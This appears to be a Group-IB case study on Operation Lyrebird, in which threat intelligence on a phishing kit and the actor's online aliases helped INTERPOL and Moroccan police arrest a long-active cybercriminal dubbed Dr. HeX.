Background

Group-IB’s investigations and support to INTERPOL proved to be the breaking point in halting the disruptive actions of yet another prolific cybercriminal, following a two-year investigation. The investigation, named Lyrebird, involved experts from Group-IB and law enforcement agencies in identifying and apprehending a threat actor responsible for multiple attacks. These attacks targeted French telecommunications companies, major banks, and multinational corporations.

The operation was especially critical due to the scale of the target and the vectors employed to scam thousands of unsuspecting victims. According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr. HeX by Group-IB (based on one of the nicknames he used), has been active since at least 2009.

Upon examination, our team uncovered the actor’s malicious infrastructure used in various campaigns, which included phishing, defacing, malware development, fraud, and carding.

Behind the scenes

The threat actor known as Dr. HeX has been active for over a decade, experimenting with various tactics, with phishing kits being one of the most prominent. These kits served as the starting point for Group-IB’s research and investigation. They also played a key role in obtaining the perpetrator’s email address, triggering a chain of events that led to the discovery of the alleged attacker’s YouTube channel, registered under the pseudonym “Dr. HeX.”

In one of the video descriptions, the attacker included a link to an Arabic crowdfunding platform. This link allowed Group-IB researchers to uncover yet another alias associated with the cybercriminal. Dr. HeX’s digital footprint revealed the breadth of his malicious activities. In addition to carding and developing phishing and malware schemes, he was also involved in website defacement.

Group-IB determined that the suspect was responsible for attacks on 134 websites between 2009 and 2018, often leaving their signature name on compromised web pages.

Impact

The alleged perpetrator, revealed to be a Moroccan citizen, was apprehended in 2021 by the Moroccan police, with the help of strong data on his cybercrimes provided by Group-IB. The operation demonstrates how collaboration between international law enforcement agencies, regional police, and private companies played a crucial role in apprehending the cybercriminal, despite the challenges posed by the multi-jurisdictional nature of the attacks.

Storyline

With French telecommunications companies, major banks, and multinational corporations, facing cyber threats by an anonymized threat actor, identifying and deanonymizing the cybercriminal was crucial.

Stepping up to assist INTERPOL, Group-IB discovered critical information about the threat actor’s operations with the extraction of a phishing kit (a tool used to create phishing web pages) exploiting the brand of a large French bank by Group-IB’s Threat Intelligence system.

The set-up of the detected phishing kit followed a common technique – the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it, and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email. Almost each of the scripts contained in the phishing kit had its creator’s nickname, Dr HeX, and contact email address.

Therefore, the entire scheme was designed to exploit the targets’ trust and obtain sensitive information from them, which could then be used to initiate secondary attacks.

Figure 1: The phishing kit’s script transforms the collected victim’s data using “bincodes[.]com” service API

What stood out was the consistent use of the creator’s nickname, Dr. HeX, and contact email address in almost every script within the phishing kit. This breadcrumb led Group-IB’s threat intelligence analysts to discover the alleged attacker’s YouTube channel, registered under the same name – Dr. HeX. In the description of one of the videos, the attacker left a link directing viewers to an Arabic crowdfunding platform. This discovery enabled Group-IB researchers to uncover yet another name associated with the cybercriminal.

Through DNS data analysis, Group-IB uncovered that this name was used to register at least two domains, both created using the email found in the phishing kit.

Decoding Dr. HeX’s malicious infrastructure

Group-IB’s experts leveraged Threat IntelligenceI’s patented graph network analysis technology to paint the most precise and descriptive picture possible of the cybercriminal’s extensive operations. It all began with a single email address extracted from the phishing kit, a digital breadcrumb leading Group-IB down a rabbit hole of deception that showed interconnected elements, revealing not only the extent of the threat actor’s malicious infrastructure but also their digital footprint. Five associated email addresses and six elusive nicknames emerged, along with active accounts on platforms ranging from Skype to YouTube.

Other things that came to light were the threat actor defacing over 130 web pages, in over a decade. Group-IB’s investigators dug deeper and found Dr. HeX’s posts on underground platforms suggesting participation in malware development, alongside his engagements in phishing, defacement, fraud, and carding – highlighting his multifaceted cyber operations.

Figure 2: Group-IB Graph findings on Dr. Hex accounts and malicious infrastructure

In addition, Group-IB has also discovered evidence suggesting Dr Hex’ involvement in attacks on several huge French corporations with the aim of stealing customer’s bank card data.

And justice for all

The information regarding Dr. Hex’s identity and the full extent of their criminal activity was then passed on to INTERPOL, that led the subsequent law enforcement operation. Our joint efforts uncovered evidence linking Dr. Hex to cyberattacks targeting prominent French corporations. This discovery facilitated cooperation between INTERPOL’s Cybercrime Directorate and the Moroccan Police via INTERPOL’s National Central Bureau in Rabat, leading to the eventual location and apprehension of the individual.

This is a significant success against a suspect who is accused of targeting unsuspecting individuals and companies across multiple regions for years, and the case highlights the threat posed by cybercrime worldwide. The arrest of this suspect is down to outstanding international investigative work and new ways of collaboration both with Moroccan police and our vital private sector partners such as Group-IB.
Stephen Kavanagh
Stephen Kavanagh
INTERPOL Executive Director of Police Services

Conclusion

Group-IB’s stern commitment to supporting INTERPOL, coupled with our expansive yet authoritative presence across the globe through our Digital Crime Resistance Centers (DCRCs), helps us proactively assist in cross-border cybercrime investigations. Operation Lyrebird serves as a prime example of how public-private partnerships combat global threats by leveraging unique knowledge and technology capabilities, transcending jurisdictional boundaries.

In our collaborative efforts to safeguard our clients, businesses, and citizens from cyber threats, we maintain ongoing cooperation with INTERPOL, providing crucial intelligence on threat actor identities and the extent of their attacks, and facilitating successful operations despite the complexity of the cases. This partnership has consistently proven effective in holding cybercriminals accountable, irrespective of their operational sophistication or geographic location.

Want to know more about Group-IB Сyber Investigation service?

Go to Cyber Investigation